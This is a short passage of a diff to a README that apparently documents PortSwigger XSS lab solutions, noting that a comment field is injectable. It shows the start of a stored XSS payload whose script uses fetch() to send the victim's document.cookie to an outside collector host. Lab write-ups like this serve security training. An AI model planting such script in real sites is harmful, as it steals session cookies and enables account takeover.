rafibz007/Portswigger-Labs/XSS/README.md

 Comment body is vuln to XSS.

-First solution using https://beeceptor.com/ (blocked by Burp WAF probably)
+First solution using https://beeceptor.com/ (blocked by Burp WAF probably) [NOTE FROM THE FUTURE: Maybe Exploit Server with Access logs could have been used]

 ```
 <script>
     fetch('https://aaaaaa.free.beeceptor.com?q=' + document.cookie, {mode: 'no-cors'})